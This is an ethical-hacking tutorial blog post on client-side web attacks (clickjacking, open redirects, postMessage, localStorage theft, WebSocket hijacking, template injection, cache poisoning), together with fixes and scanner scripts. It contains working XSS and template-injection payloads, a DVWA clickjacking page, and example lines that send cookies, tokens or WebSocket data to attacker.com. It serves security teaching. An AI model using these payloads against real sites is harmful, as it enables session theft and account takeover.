Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS

Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS

leh-banner.jpg

What will I learn

  • Clickjacking: tricking users into clicking hidden elements through invisible iframes;
  • Open redirects: weaponizing trusted domains for phishing campaigns;
  • Postmessage vulnerabilities: exploiting cross-origin communication;
  • WebSocket hijacking: the CSRF equivalent for real-time connections;
  • Local storage theft and why it's worse than cookie theft;
  • DOM XSS through client-side template injection in Angular, React, and Vue;
  • Building automated scanning tools for each attack class.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Your hacking lab from Episode 2;
  • Basic HTML/JavaScript knowledge;
  • Python 3 with requests (pip install requests);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Intermediate

Curriculum (of the Learn Ethical Hacking series):

Solutions to Episode 22 Exercises

Exercise 1 -- Business logic exploitation:

(a) Negative quantity: POST /api/cart/add {"product":"laptop","quantity":-2}
    Cart total: 49.99 * -2 = -$99.98 (store OWES the attacker)

(b) Race condition on coupon: 20 threads, 8-12 successful redemptions
    HALFOFF applied multiple times: total reduced from $49.99 to ~$0.02

(c) Transfer race: 10 simultaneous $100 transfers from user1 to user2
    user1 balance: -$800 (went negative), user2 balance: $1100
    Total money in system: $300 (started with $200) -- money created from nothing

(d) Checkout manipulation: POST /api/checkout {"amount": 0.01}
    Charged: $0.01, Cart total: $49.99 -- paid one cent for a $50 item

The key insight: every attack used perfectly valid HTTP requests with well-formed JSON. No injection. No encoding tricks. Just values the developers didn't anticipate.

Exercise 2 -- Race condition tester:

import requests, threading, json, sys

def race_test(url, method, body, headers, threads=20, expected_max=1):
    results = []
    def fire():
        try:
            r = getattr(requests, method.lower())(url, json=body, headers=headers, timeout=5)
            results.append((r.status_code, r.json()))
        except:
            results.append((0, {}))

    ts = [threading.Thread(target=fire) for _ in range(threads)]
    for t in ts: t.start()
    for t in ts: t.join()

    ok = sum(1 for code, _ in results if code == 200)
    print(f"Success: {ok}/{len(results)}")
    if ok > expected_max:
        print(f"[!] RACE CONDITION: {ok} successes (expected max {expected_max})")
    else:
        print(f"[*] No race detected (within expected bounds)")
    return results

Exercise 3 -- Fixes:

# Quantity validation
quantity = data.get('quantity', 1)
if not isinstance(quantity, int) or quantity < 1:
    return jsonify({"error": "Quantity must be a positive integer"}), 400

# Atomic coupon with lock
coupon_lock = threading.Lock()
def apply_coupon():
    with coupon_lock:
        if coupon['used']:
            return jsonify({"error": "Already used"}), 400
        coupon['used'] = True
        cart['total'] *= (1 - coupon['discount'] / 100)

# Atomic transfer with lock
transfer_lock = threading.Lock()
def transfer():
    with transfer_lock:
        if balances[sender] < amount:
            return jsonify({"error": "Insufficient funds"}), 400
        balances[sender] -= amount
        balances[receiver] += amount

# Server-side total at checkout (ignore client amount)
def checkout():
    return jsonify({"charged": cart['total']})

Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS

We covered XSS in episodes 14 and 15. Reflected XSS, stored XSS, DOM-based XSS, filter bypasses, CSP evasion -- the full spectrum. And XSS is probably the most famous client-side vulnerability because it's dramatic: you inject JavaScript, the browser executes it, the victim's session is stolen. Clear input, clear output, clear impact.

But XSS is NOT the only client-side attack. The browser is a staggeringly complex application that enforces dozens of security boundaries: same-origin policy, Content Security Policy, frame embedding rules, cookie scope, CORS, postMessage channels, local storage isolation, WebSocket origin checking. Every one of those boundaries exists because there's an attack that exploits the gap when the boundary is missing or misconfigured. And unlike server-side vulnerabilities where you need to reach the server's code, client-side attacks execute in the VICTIM'S browser -- a machine you don't control, running a browser you didn't choose, on a network you can't observe. The attack surface is the user's own software.

Het slagveld is de browser. En de gebruiker weet het niet eens.

Today we look at everything else in the client-side landscape. Clickjacking, open redirects, postMessage abuse, WebSocket hijacking, local storage theft, DOM-based template injection, and browser cache poisoning. Some of these require an XSS as a precondition. Others don't -- they exploit entirely separate mechanisms that have nothing to do with script injection. Together with XSS, they form the complete picture of what can go wrong when the browser is the execution environment.

Clickjacking: The Invisible Click

Clickjacking is beautifully simple. The attacker loads a target website inside an invisible iframe on their own page. The iframe is transparent -- opacity zero, z-index above everything else. Below the iframe, the attacker positions their own UI elements: buttons, forms, whatever looks enticing. The victim sees the attacker's page. They click what they think is the attacker's button. They actually click whatever is at that position in the invisible iframe. The target site receives a legitimate click from an authenticated user who had no idea they were interacting with it.

This is fundamentally different from CSRF (episode 16). CSRF submits a forged request. Clickjacking makes the user submit the request THEMSELVES, through a real browser interaction with the real target site, in a real authenticated session. The click is genuine. The intent is not.

(html comment removed:  clickjack.html -- attacker hosts this on their own server )
<html>
<head><title>Win a Prize!</title></head>
<body>
<h1>Click the button to claim your reward!</h1>

(html comment removed:  Transparent iframe covering the "button" area )
<iframe src="http://192.168.56.101/dvwa/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change"
  style="position:absolute; top:80px; left:50px; width:600px; height:400px; opacity:0.0; z-index:2;">
</iframe>

(html comment removed:  Visible "button" positioned under the iframe's submit button )
<button style="position:absolute; top:250px; left:200px; z-index:1; font-size:24px; padding:20px;">
  Claim Prize!
</button>
</body>
</html>

The victim sees "Claim Prize!" and clicks. They actually clicked the DVWA password change form's submit button inside the invisible iframe. Their DVWA password is now "hacked." They never saw DVWA. They never knew they were interacting with it. The browser did exactly what it was told -- render an iframe, process a click -- and the result is an unauthorized action by an authenticated user.

Where clickjacking gets really dangerous is on social media and financial platforms. "Like" buttons, "Follow" buttons, "Transfer" buttons, "Approve" buttons -- any single-click action that the attacker can position under their decoy is vulnerable. Facebook's "Like" button was famously clickjacked for years before they implemented frame-busting (the original "likejacking" attacks of 2010-2012). The fix is straightforward:

X-Frame-Options: DENY

Or the modern equivalent:

Content-Security-Policy: frame-ancestors 'none'

Both tell the browser: do NOT render this page inside a frame. If someone tries to iframe the site, the browser refuses. The page only renders as a top-level document. This one header blocks all clickjacking attacks -- and yet a staggering number of production sites still don't set it. Why? Because the header doesn't affect functionality. The site works fine without it. It only matters when someone is actively attacking your users, and until that happens nobody notices it's missing ;-)

Having said that, X-Frame-Options is the older header with limited options (DENY or SAMEORIGIN). frame-ancestors in CSP is more flexible -- you can whitelist specific origins that ARE allowed to frame your site. Modern applications should use CSP frame-ancestors and set X-Frame-Options as a fallback for older browsers.

Open Redirects: Weaponizing Trust

An open redirect is a URL on a trusted domain that bounces the user to any URL specified in a parameter:

https://trusted-bank.com/redirect?url=https://evil-attacker.com/fake-login

This looks harmless -- it's just a redirect, right? But consider the social engineering angle. You're a bank customer. You receive an email: "Please verify your account." The link is https://trusted-bank.com/redirect?url=https://evil-attacker.com/fake-login. You hover over the link (because you're security-conscious!) and see trusted-bank.com. The domain is correct. You click. You land on a page that looks exactly like the bank's login. You type your username and password. Except you're on evil-attacker.com now, and your credentials just went to the attacker.

Open redirects make phishing dramatically more effective because the initial URL is on the REAL domain. The user did their due diligence -- they checked the URL -- and was still fooled. This is why open redirects are classified as vulnerabilities despite being "just a redirect." The redirect itself doesn't compromise the server. It compromises the users' TRUST in the server's URL.

#!/usr/bin/env python3
"""Open redirect finder -- tests common redirect parameters."""
import requests
from urllib.parse import urlencode

TARGET = "http://192.168.56.101"
REDIRECT_PARAMS = ['url', 'redirect', 'next', 'return', 'returnUrl', 'goto',
                   'redirect_uri', 'continue', 'dest', 'destination', 'rurl',
                   'return_to', 'forward', 'target', 'out', 'view', 'redir',
                   'ReturnUrl', 'checkout_url', 'return_path']
CANARY = "http://evil.com"

print(f"[*] Testing {len(REDIRECT_PARAMS)} redirect parameters on {TARGET}")

for param in REDIRECT_PARAMS:
    test_url = f"{TARGET}/redirect?{urlencode({param: CANARY})}"
    try:
        resp = requests.get(test_url, allow_redirects=False, timeout=5)
        location = resp.headers.get('Location', '')
        if CANARY in location:
            print(f"[+] Open redirect via '{param}': {test_url}")
            print(f"    Redirects to: {location}")
        elif resp.status_code in [301, 302, 303, 307]:
            print(f"[?] Redirect on '{param}' but to: {location}")
    except requests.exceptions.RequestException:
        pass

Open redirects also chain with other vulnerabilities. An open redirect + an OAuth implementation that validates redirect URIs by prefix means you can steal OAuth tokens. The OAuth spec says the redirect URI must match exactly, but many implementations check "does it START WITH the registered domain?" If trusted-bank.com/redirect?url=attacker.com passes that check (because it starts with trusted-bank.com), the OAuth token gets redirected to the attacker. That's how open redirects escalate from "low severity" to "account takeover" in the real world.

Postmessage Attacks: The Overlooked Channel

Modern web applications use window.postMessage() for cross-origin communication between windows and iframes. It's the legitimate way to send data between different origins -- the browser's built-in alternative to the hacks developers used before (like URL fragment communication or shared cookies). The API is simple: one window sends a message, the other window receives it.

The vulnerability: if the receiving window doesn't validate where the message came from, ANY page can send messages to it.

// VULNERABLE listener -- accepts messages from ANY origin
window.addEventListener('message', function(event) {
    // No origin check! Any page that opens or frames us can send messages
    document.getElementById('output').innerHTML = event.data;
    // innerHTML + attacker-controlled data = XSS
});
(html comment removed:  Attacker's page that loads the vulnerable app in an iframe )
<iframe id="target" src="https://vulnerable-app.com/dashboard"></iframe>
<script>
// Wait for iframe to load, then send a malicious message
document.getElementById('target').onload = function() {
    this.contentWindow.postMessage(
        '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">',
        '*'
    );
};
</script>

If the listener uses innerHTML to display the message (instead of textContent), the attacker just achieved XSS through the postMessage channel. But even with textContent, if the listener does something security-sensitive -- updates user preferences, triggers a state change, redirects the page, modifies DOM elements that affect application logic -- the attacker controls the input.

The fix is one line:

window.addEventListener('message', function(event) {
    if (event.origin !== 'https://trusted-partner.com') return;
    // Now safe to process event.data
    document.getElementById('output').textContent = event.data;
});

Always check event.origin. Never use '*' as the target origin when sending messages that contain sensitive data. Never use innerHTML with received message data. These are the postMessage security rules, and they're violated constantly because the developer tests their own origin (where the messages are legitimate) and never considers that an attacker's page could send messages too.

In pentests, postMessage vulnerabilities are found by searching the application's JavaScript for addEventListener('message' and checking whether the handler validates event.origin. If it doesn't, you have a vulnerability. The impact depends on what the handler DOES with the message data -- from benign (displays text) to critical (triggers actions, stores data, evaluates code).

Local Storage Theft: The Missing HttpOnly

Back in episode 14, we covered how XSS steals session cookies. But many modern SPAs (Single Page Applications) don't USE cookies for authentication. They use JWT tokens stored in localStorage. And localStorage has a critical security gap compared to cookies: there is no HttpOnly equivalent.

// The application stores the JWT in localStorage (extremely common in SPAs)
localStorage.setItem('auth_token', 'eyJhbGciOi...');
localStorage.setItem('refresh_token', 'eyJhbGciOi...');
localStorage.setItem('user_role', 'admin');

// Any XSS on the same origin can read ALL of it
var stolen = {
    auth: localStorage.getItem('auth_token'),
    refresh: localStorage.getItem('refresh_token'),
    role: localStorage.getItem('user_role')
};
fetch('https://attacker.com/collect', {
    method: 'POST',
    body: JSON.stringify(stolen)
});

With HttpOnly cookies, even if you achieve XSS, you can NOT read the cookie from JavaScript. The browser enforces this -- document.cookie simply doesn't return HttpOnly cookies. The attacker can use the XSS to make requests (the cookie is sent automatically), but they can't steal the cookie itself. The attack is limited to the XSS session.

With localStorage, there's no such restriction. Any JavaScript running on the same origin reads everything. The XSS steals the token, the attacker uses it from their own machine, and the victim can't even tell -- closing the browser doesn't invalidate the stolen token. The attacker has persistent access until the token expires or is revoked.

This is why security professionals (and OWASP, and basically every security guide published since 2018) recommend HttpOnly cookies over localStorage for authentication tokens in web applications. The cookie is invisible to JavaScript -- localStorage is a glass cabinet.

Having said that, localStorage tokens aren't inherently insecure. If your site has ZERO XSS vulnerabilities, the tokens are safe. But "zero XSS" is a strong assumption for any non-trivial web application. Cookies with HttpOnly give you defense in depth: even if XSS appears, the authentication tokens survive. That's the security engineering mindset -- assume breaches happen and design layers that limit damage.

WebSocket Hijacking: CSRF's Real-Time Cousin

WebSocket connections don't follow the same rules as HTTP. There are no CORS restrictions on WebSocket connections. The browser sends cookies automatically (just like HTTP), but the server receives the connection from whatever page initiated it. If the WebSocket server doesn't verify the Origin header, any web page can open a WebSocket connection to it:

// Attacker's page -- opens a WebSocket to the target server
// The browser sends the victim's cookies automatically
var ws = new WebSocket('ws://vulnerable-app.com/live-data');

ws.onopen = function() {
    console.log('[+] Connected -- browser sent auth cookies automatically');
    // Send commands as the authenticated user
    ws.send(JSON.stringify({action: 'get_messages', since: 0}));
};

ws.onmessage = function(event) {
    // Receive real-time data intended for the authenticated user
    fetch('https://attacker.com/exfil', {
        method: 'POST',
        body: event.data
    });
};

This is Cross-Site WebSocket Hijacking (CSWSH) -- the WebSocket equivalent of CSRF. The victim visits the attacker's page. The page opens a WebSocket to the vulnerable server. The browser includes the victim's authentication cookies. The server sees a valid authenticated connection and starts sending data. The attacker's page receives the data and exfiltrates it.

The impact depends on what the WebSocket carries. Chat messages? The attacker reads private conversations. Financial data? Real-time portfolio information, trade notifications. Administrative actions? The attacker sends commands as the admin.

The defense is origin validation on the server side:

# Server-side WebSocket connection handler
async def websocket_handler(websocket, path):
    origin = websocket.request_headers.get('Origin', '')
    allowed = ['https://vulnerable-app.com', 'https://www.vulnerable-app.com']

    if origin not in allowed:
        await websocket.close(1008, 'Origin not allowed')
        return

    # Origin validated -- proceed with connection
    async for message in websocket:
        await process_message(websocket, message)

Many WebSocket libraries and frameworks do NOT check the Origin header by default. The developer sets up the WebSocket endpoint, the front-end connects, messages flow, everything works. Nobody thinks about what happens when a DIFFERENT page connects with the same cookies. The pattern is identical to CSRF: the browser's automatic credential inclusion enables cross-origin attacks, and the defense is origin validation ;-)

Client-Side Template Injection

Modern JavaScript frameworks use template expressions that evaluate code within their own sandboxed context. If user input reaches a template expression, the attacker can break out of the sandbox and execute arbitrary JavaScript:

Angular (the most infamous):

// User input rendered in Angular template context
{{constructor.constructor('alert(document.domain)')()}}

// Older Angular versions (1.x) had even simpler payloads:
{{$on.constructor('alert(1)')()}}

Vue.js:

// If user input reaches a Vue template
{{_openBlock.constructor('alert(1)')()}}

// Or through v-html directive (equivalent to innerHTML):
<div v-html="userInput"></div>

These payloads don't contain <script> tags. They don't use event handlers like onerror. They don't look like XSS to a traditional WAF. They execute JavaScript through the framework's own template engine, which evaluates the expression, reaches the constructor.constructor chain (which is Function()), and executes arbitrary code. This bypasses every XSS filter that looks for HTML injection signatures because the payload is framework-specific, not HTML-specific.

Client-side template injection (CSTI) is essentially XSS through a different door. The impact is the same -- arbitrary JavaScript execution in the victim's browser. But the detection is harder because the payload looks like a template expression, not a script tag. If the WAF doesn't understand the framework being used, it won't catch the payload.

Where CSTI appears: any place where user input is interpolated into a template without sanitization. URL parameters displayed in the page, search terms shown in results, error messages containing user input, chat messages rendered through a framework component. The developer uses {{variable}} thinking it's safe (Angular auto-escapes for HTML!) but the auto-escaping handles HTML entities, not template expressions. The input {{1+1}} renders as 2, proving the template engine evaluates user input.

DOM XSS: Sources and Sinks

We touched on DOM XSS in episode 14, but it deserves deeper treatment in the context of client-side attacks. DOM XSS happens entirely in the browser -- the server never sees the payload. The attacker's input enters through a source (a place where attacker-controlled data enters JavaScript) and reaches a sink (a place where the data causes execution).

Sources (attacker-controlled input):
  document.location       location.hash          location.search
  location.href           document.URL           document.referrer
  window.name             postMessage data       localStorage.getItem()
  sessionStorage          URL fragment (#)       URL search params (?)

Sinks (dangerous execution points):
  innerHTML               outerHTML              document.write()
  eval()                  setTimeout(string)     setInterval(string)
  Function()              element.src =          element.href =
  jQuery.html()           $.html()               insertAdjacentHTML()

When a source connects to a sink without sanitization, you have DOM XSS:

// SOURCE: location.hash -- attacker controls the URL fragment
var userInput = location.hash.substring(1);

// SINK: innerHTML -- browser parses the string as HTML
document.getElementById('greeting').innerHTML = 'Hello, ' + userInput;

// Attack URL: https://target.com/#<img src=x onerror=alert(document.cookie)>
// The payload goes from URL fragment -> JavaScript variable -> innerHTML -> execution
// The server never sees the fragment (browsers don't send # data in HTTP requests)

The critical difference from reflected XSS: the payload is in the URL fragment (#...), which the browser does NOT send to the server. Server-side logging shows a clean request. Server-side input validation never fires. WAFs sitting in front of the server can't inspect what they never receive. The entire attack happens in the browser's JavaScript runtime.

Here's an automated scanner that finds these patterns:

#!/usr/bin/env python3
"""dom_xss_scan.py - Scan JavaScript for potential DOM XSS sinks and sources."""
import re
import sys
import requests

# DOM XSS sources (where attacker-controlled data enters)
SOURCES = [
    r'document\.location', r'document\.URL', r'document\.referrer',
    r'location\.hash', r'location\.search', r'location\.href',
    r'window\.name', r'document\.cookie',
    r'postMessage', r'localStorage\.getItem', r'sessionStorage\.getItem',
]

# DOM XSS sinks (where data causes execution)
SINKS = [
    r'innerHTML', r'outerHTML', r'document\.write',
    r'eval\s*\(', r'setTimeout\s*\(', r'setInterval\s*\(',
    r'Function\s*\(', r'\.src\s*=', r'\.href\s*=',
    r'jQuery\.html\(', r'\$\([^)]+\)\.html\(',
    r'insertAdjacentHTML',
]

def scan_js(content, filename=""):
    findings = []
    lines = content.split('\n')

    for i, line in enumerate(lines, 1):
        for source in SOURCES:
            if re.search(source, line):
                findings.append(('SOURCE', source, i, line.strip()[:120]))
        for sink in SINKS:
            if re.search(sink, line):
                findings.append(('SINK', sink, i, line.strip()[:120]))

    return findings

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if not target:
        print("Usage: python3 dom_xss_scan.py <url_or_file>")
        sys.exit(1)

    if target.startswith("http"):
        content = requests.get(target, timeout=15).text
    else:
        with open(target) as f:
            content = f.read()

    findings = scan_js(content, target)

    sources = [f for f in findings if f[0] == 'SOURCE']
    sinks = [f for f in findings if f[0] == 'SINK']

    print(f"\n[*] DOM XSS Analysis: {target}")
    print(f"    Sources found: {len(sources)}")
    print(f"    Sinks found:   {len(sinks)}")

    if sources:
        print(f"\n--- SOURCES (attacker-controlled input) ---")
        for _, pattern, line, code in sources:
            print(f"  Line {line}: {code}")

    if sinks:
        print(f"\n--- SINKS (dangerous output) ---")
        for _, pattern, line, code in sinks:
            print(f"  Line {line}: {code}")

    if sources and sinks:
        print(f"\n[!] Both sources AND sinks found -- manual review needed")
        print(f"    Check if any source flows into any sink without sanitization")
    elif sinks and not sources:
        print(f"\n[?] Sinks found but no obvious sources")
        print(f"    Check for data flow from other files or indirect sources")

This finds the individual pieces -- sources and sinks -- but can't trace data flow between them (that requires a proper taint analysis engine like those in Burp Suite or Semgrep). In practice, finding sources and sinks in the same file is enough to warrant manual investigation. If location.hash and innerHTML both appear in the same JavaScript file, there's a reasonable chance they're connected.

Browser Cache Poisoning

Here's one that doesn't get enough attention. If an application reflects user input into a cached response, the attacker's payload persists in the cache and is served to OTHER users who request the same resource. This turns a reflected vulnerability into a stored one without touching the server's database:

# Normal request -- response gets cached by CDN or browser
GET /page?lang=en HTTP/1.1
Host: target.com

# Poisoned request -- inject payload via a header the CDN caches on
GET /page HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker.com

# If the application uses X-Forwarded-Host to build URLs in the response,
# the cached response now contains attacker.com URLs
# Every subsequent visitor gets the poisoned cached version

The specific technique varies depending on what headers the CDN caches on and what headers the application reflects. The general principle: if you can influence a cached response, your payload is served to every user who hits that cache entry. This is why cache keys and cache-control headers matter -- they determine which request variations get distinct cache entries and which ones share a cache entry.

In 2018, security researcher James Kettle from PortSwigger published groundbreaking research on web cache poisoning that affected sites like Mozilla, GitHub, and Cloudflare customers. The attacks used unkeyed headers (headers that the cache ignores when computing the cache key but the application processes and reflects) to inject malicious content into cached responses. A single poisoned request could affect thousands of users for the duration of the cache TTL.

The Clickjacking PoC Generator

Let's build a practical tool for pentests:

#!/usr/bin/env python3
"""clickjack_tester.py - Test and generate clickjacking PoC pages."""
import sys
import requests

def check_framing(url):
    """Check if the target can be framed (clickjacked)."""
    try:
        resp = requests.get(url, timeout=10, allow_redirects=True)
    except requests.exceptions.RequestException as e:
        return f"ERROR: {e}"

    xfo = resp.headers.get('X-Frame-Options', '').upper()
    csp = resp.headers.get('Content-Security-Policy', '')

    frame_ancestors = ''
    if 'frame-ancestors' in csp:
        for directive in csp.split(';'):
            if 'frame-ancestors' in directive:
                frame_ancestors = directive.strip()

    if xfo == 'DENY' or "frame-ancestors 'none'" in frame_ancestors:
        return 'PROTECTED (cannot be framed)'
    elif xfo == 'SAMEORIGIN' or "frame-ancestors 'self'" in frame_ancestors:
        return 'PARTIAL (same-origin framing only)'
    elif xfo or frame_ancestors:
        return f'RESTRICTED ({xfo} / {frame_ancestors})'
    else:
        return 'VULNERABLE (no framing protection)'

def generate_poc(target_url, button_text="Click to claim your reward!"):
    """Generate a clickjacking proof-of-concept HTML page."""
    return f"""<!DOCTYPE html>
<html>
<head><title>Clickjacking PoC</title></head>
<body>
<h1 style="font-family: Arial;">{button_text}</h1>
<div style="position: relative; width: 600px; height: 500px;">

  (html comment removed:  Visible decoy button )
  <button style="position: absolute; top: 200px; left: 60px;
    z-index: 1; padding: 15px 30px; font-size: 20px; cursor: pointer;
    background: #4CAF50; color: white; border: none; border-radius: 5px;">
    {button_text}
  </button>

  (html comment removed:  Invisible iframe with target page overlaid )
  <iframe src="{target_url}"
    style="position: absolute; top: 0; left: 0;
    width: 600px; height: 500px; opacity: 0.0001; z-index: 2; border: none;">
  </iframe>

</div>
<p style="margin-top: 520px; color: #999; font-size: 11px;">
  [PoC] The iframe above is invisible. Clicking the button interacts with
  whatever element is at that position in the target page.
</p>
</body>
</html>"""

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 clickjack_tester.py <url> [--poc]")
        sys.exit(1)

    url = sys.argv[1]
    print(f"[*] Target: {url}")
    result = check_framing(url)
    print(f"[*] Status: {result}")

    if '--poc' in sys.argv and 'VULNERABLE' in result:
        poc = generate_poc(url)
        with open("clickjack_poc.html", "w") as f:
            f.write(poc)
        print(f"[+] PoC saved to clickjack_poc.html")
        print(f"[*] Open in a browser to demonstrate the attack")

This does two things: first it checks whether the target has framing protections (X-Frame-Options or CSP frame-ancestors), then optionally generates a PoC HTML page you can open in a browser to demonstrate the clickjacking. In a pentest report, including a working PoC that stakeholders can click (on a test instance!) is dramatically more convincing than describing the vulnerability in text.

The Comprehensive Client-Side Scanner

Let's put it all together into a single reconnaissance tool:

#!/usr/bin/env python3
"""client_side_scanner.py - Check for common client-side attack surfaces."""
import requests
import re
import sys

def scan_target(url):
    """Scan a target URL for client-side vulnerability indicators."""
    print(f"\n{'='*60}")
    print(f"Client-Side Attack Surface Scan: {url}")
    print(f"{'='*60}\n")

    try:
        resp = requests.get(url, timeout=15)
    except requests.exceptions.RequestException as e:
        print(f"[!] Connection failed: {e}")
        return

    headers = resp.headers
    body = resp.text

    # 1. Clickjacking (framing protection)
    xfo = headers.get('X-Frame-Options', '')
    csp = headers.get('Content-Security-Policy', '')
    has_frame_protection = bool(xfo) or 'frame-ancestors' in csp
    status = 'PROTECTED' if has_frame_protection else 'MISSING'
    print(f"[{'+'if has_frame_protection else '!'}] Clickjacking: {status}")
    if xfo: print(f"    X-Frame-Options: {xfo}")
    if 'frame-ancestors' in csp: print(f"    CSP frame-ancestors found")

    # 2. Open redirect indicators
    redirect_params = ['url', 'redirect', 'next', 'return', 'goto',
                       'redirect_uri', 'continue', 'dest', 'rurl']
    for param in redirect_params:
        test = f"{url}?{param}=https://evil.com"
        try:
            r = requests.get(test, allow_redirects=False, timeout=5)
            loc = r.headers.get('Location', '')
            if 'evil.com' in loc:
                print(f"[!] Open redirect via '{param}' parameter")
        except:
            pass

    # 3. localStorage usage in response body
    ls_patterns = re.findall(r'localStorage\.(setItem|getItem)\([\'"]([^\'"]+)', body)
    if ls_patterns:
        print(f"[!] localStorage usage detected:")
        for action, key in ls_patterns:
            print(f"    {action}('{key}')")
        auth_keys = [k for _, k in ls_patterns if any(
            t in k.lower() for t in ['token', 'auth', 'jwt', 'session', 'key'])]
        if auth_keys:
            print(f"    [!!] Auth tokens in localStorage: {auth_keys}")

    # 4. WebSocket endpoints
    ws_urls = re.findall(r'wss?://[^\s\'"]+', body)
    if ws_urls:
        print(f"[!] WebSocket endpoints found:")
        for ws in set(ws_urls):
            print(f"    {ws}")

    # 5. postMessage listeners
    pm_listeners = re.findall(r'addEventListener\s*\(\s*[\'"]message[\'"]', body)
    if pm_listeners:
        print(f"[!] postMessage listeners: {len(pm_listeners)} found")
        # Check for origin validation
        if 'event.origin' not in body and 'e.origin' not in body:
            print(f"    [!!] No origin validation detected in response body")

    # 6. Template injection indicators
    frameworks = []
    if 'ng-app' in body or 'ng-controller' in body:
        frameworks.append('Angular (ng-*)')
    if '__vue__' in body or 'Vue.component' in body or 'v-bind' in body:
        frameworks.append('Vue.js')
    if 'react' in body.lower() or '_reactRoot' in body:
        frameworks.append('React')
    if frameworks:
        print(f"[*] JS frameworks detected: {', '.join(frameworks)}")
        print(f"    Test for CSTI with: {{{{constructor.constructor('alert(1)')()}}}}")

    # 7. DOM XSS sink indicators in inline scripts
    inline_scripts = re.findall(r'<script[^>]*>(.*?)</script>', body, re.DOTALL)
    dangerous_sinks = 0
    for script in inline_scripts:
        for sink in ['innerHTML', 'outerHTML', 'document.write', 'eval(']:
            if sink in script:
                dangerous_sinks += 1
    if dangerous_sinks:
        print(f"[!] DOM XSS sinks in inline scripts: {dangerous_sinks}")

    print(f"\n{'='*60}")
    print(f"Scan complete.")

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if not target:
        print("Usage: python3 client_side_scanner.py <url>")
        sys.exit(1)
    scan_target(target)

This scanner checks seven attack surfaces in one pass: clickjacking protections, open redirect parameters, localStorage token storage, WebSocket endpoints, postMessage listeners, framework detection (for template injection), and DOM XSS sinks in inline scripts. It's not a vulnerability scanner -- it's an attack surface mapper. It tells you WHERE to look, not whether the vulnerability exists. The human analysis that follows (actually exploiting the findings) is still necessary.

The AI Slop Connection

Continuing our thread from episode 6. Client-side attacks reveal a particular weakness in AI-generated code because AI models don't think adversarially about browser security boundaries.

AI-generated React/Vue/Angular componets routinely:

  • Use dangerouslySetInnerHTML (React) or v-html (Vue) to render user-supplied content, creating DOM XSS sinks that bypass the framework's built-in escaping
  • Store JWTs in localStorage because the tutorial they were trained on did it that way (JWT.io's own documentation used to show localStorage examples before community pushback)
  • Implement postMessage handlers without origin checking because "it works" between their own windows during development
  • Skip X-Frame-Options headers because the AI generates application code, not deployment configuraton
  • Build redirect endpoints that take a URL parameter and redirect to it (because that's the functional requirement) without validating the destination is on the same domain

Each of these is a client-side attack surface that exists because the AI optimizes for "does the feature work?" and never considers "can a malicious page abuse this feature?" The browser's security model is complex, and AI models treat it as invisible infrastructure rather than an active battleground ;-)

Dit is waarom je de browser moet begrijpen, niet alleen de server.

Prevention: Client-Side Security Headers

A significant portion of client-side attacks are preventable through proper HTTP security headers. Here's the checklist:

# The essential security headers
X-Frame-Options: DENY
Content-Security-Policy: frame-ancestors 'none'; default-src 'self'; script-src 'self'
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: camera=(), microphone=(), geolocation=()

X-Frame-Options: DENY blocks clickjacking. Content-Security-Policy with frame-ancestors does the same thing but also restricts where scripts can load from (blocking most XSS and template injection). X-Content-Type-Options: nosniff prevents the browser from MIME-sniffing uploaded files (an SVG served as text/plain won't execute scripts). Referrer-Policy controls what URL information leaks to third-party sites. Permissions-Policy (formerly Feature-Policy) restricts browser features like camera access.

These headers are deployment configuration, not application code. They're set in nginx, Apache, Cloudflare, or the application framework's response middleware. They take five minutes to configure. And they block entire categories of client-side attacks with zero impact on functionality. The fact that most web applications still don't set them all is... well, it's job security for pentesters ;-)

Exercises

Exercise 1: Build a clickjacking proof-of-concept against DVWA's CSRF page (like the example in this episode). Host clickjack.html on your Kali machine using python3 -m http.server 8888. Open it in the browser that's already authenticated to DVWA. Verify that clicking your "prize button" actually submits the CSRF form in the invisible iframe and changes the DVWA password. Then add X-Frame-Options: DENY to DVWA's Apache config (Header always set X-Frame-Options "DENY" in the VirtualHost block, then sudo systemctl restart apache2) and verify the clickjacking no longer works. Document both the working attack and the blocked attempt.

Exercise 2: Write a Python script called client_side_scanner.py that takes a URL and checks for: (a) missing X-Frame-Options header (clickjacking risk), (b) open redirect parameters (test the common parameter list from this episode against the target), (c) tokens stored in the response body with patterns suggesting localStorage usage (search for localStorage.setItem with auth-related key names), (d) WebSocket endpoints (search for ws:// or wss:// URLs in JavaScript). Test it against DVWA and two public websites of your choice. Document the findings for each target.

Exercise 3: Create two HTML pages that demonstrate the postMessage vulnerability. Page 1 ("vulnerable.html") listens for messages without checking event.origin and displays received messages using innerHTML. Page 2 ("attacker.html") loads Page 1 in an iframe and sends a crafted message containing an XSS payload (<img src=x onerror=alert('XSS via postMessage')>). Verify the XSS fires. Then create Page 3 ("secure.html") -- identical to Page 1 but with proper origin validation. Load it in the same attacker page and verify the XSS is blocked. Document the difference in behavior.


De browser is een slagveld. Elke feature is een potentieel wapen.

@scipio



0
0
0.000
0 comments